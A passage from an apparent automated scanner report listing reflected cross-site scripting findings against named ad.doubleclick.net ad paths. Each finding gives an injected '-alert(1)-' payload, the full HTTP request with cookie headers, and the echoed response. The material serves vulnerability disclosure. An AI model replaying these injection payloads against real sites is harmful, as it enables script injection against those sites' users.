Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7019
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 12:17:46 GMT
Expires: Mon, 13 Jun 2011 12:17:46 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
gEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=1284f"-alert(1)-"841d2a94644http://www.samsclub.com/sams/pagedetails/content.jsp?pageName=fathersDay_2011&pid=VML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowsc
...[SNIP]...

4.6. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [ai parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83e2d"-alert(1)-"473a8a0b356 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA83e2d"-alert(1)-"473a8a0b356&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
Date: Mon, 13 Jun 2011 12:17:15 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA83e2d"-alert(1)-"473a8a0b356&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fs
...[SNIP]...

4.7. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa3c0"-alert(1)-"9e76203f975 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342aa3c0"-alert(1)-"9e76203f975&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
Date: Mon, 13 Jun 2011 12:17:44 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
UuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342aa3c0"-alert(1)-"9e76203f975&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

4.8. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7cc6"-alert(1)-"70134b5d168 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1a7cc6"-alert(1)-"70134b5d168&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
Date: Mon, 13 Jun 2011 12:17:25 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1a7cc6"-alert(1)-"70134b5d168&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl =
...[SNIP]...

4.9. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [sig parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0c04"-alert(1)-"8bc6f69c449 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzwf0c04"-alert(1)-"8bc6f69c449&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
Date: Mon, 13 Jun 2011 12:17:34 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzwf0c04"-alert(1)-"8bc6f69c449&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

4.10. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 742ff"-alert(1)-"6805e040324 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L742ff"-alert(1)-"6805e040324&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
Date: Mon, 13 Jun 2011 12:17:05 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/f/189/%2a/p%3B242168662%3B0-0%3B0%3B64929697%3B3454-728/90%3B42471813/42489600/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L742ff"-alert(1)-"6805e040324&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfn
...[SNIP]...

4.11. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [adurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52a5f"-alert(1)-"97ebfb0646b was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=52a5f"-alert(1)-"97ebfb0646b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7048
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:31:47 GMT
Expires: Mon, 13 Jun 2011 11:31:47 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=52a5f"-alert(1)-"97ebfb0646bhttp://www.samsclub.com/sams/pagedetails/content.jsp?pageName=fathersDay_2011&pid=VML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowsc
...[SNIP]...

4.12. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [ai parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9767b"-alert(1)-"c087c4f6224 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE9767b"-alert(1)-"c087c4f6224&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:16 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
H3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE9767b"-alert(1)-"c087c4f6224&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fs
...[SNIP]...

4.13. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33607"-alert(1)-"8c4e642dafd was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-749415602701834233607"-alert(1)-"8c4e642dafd&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
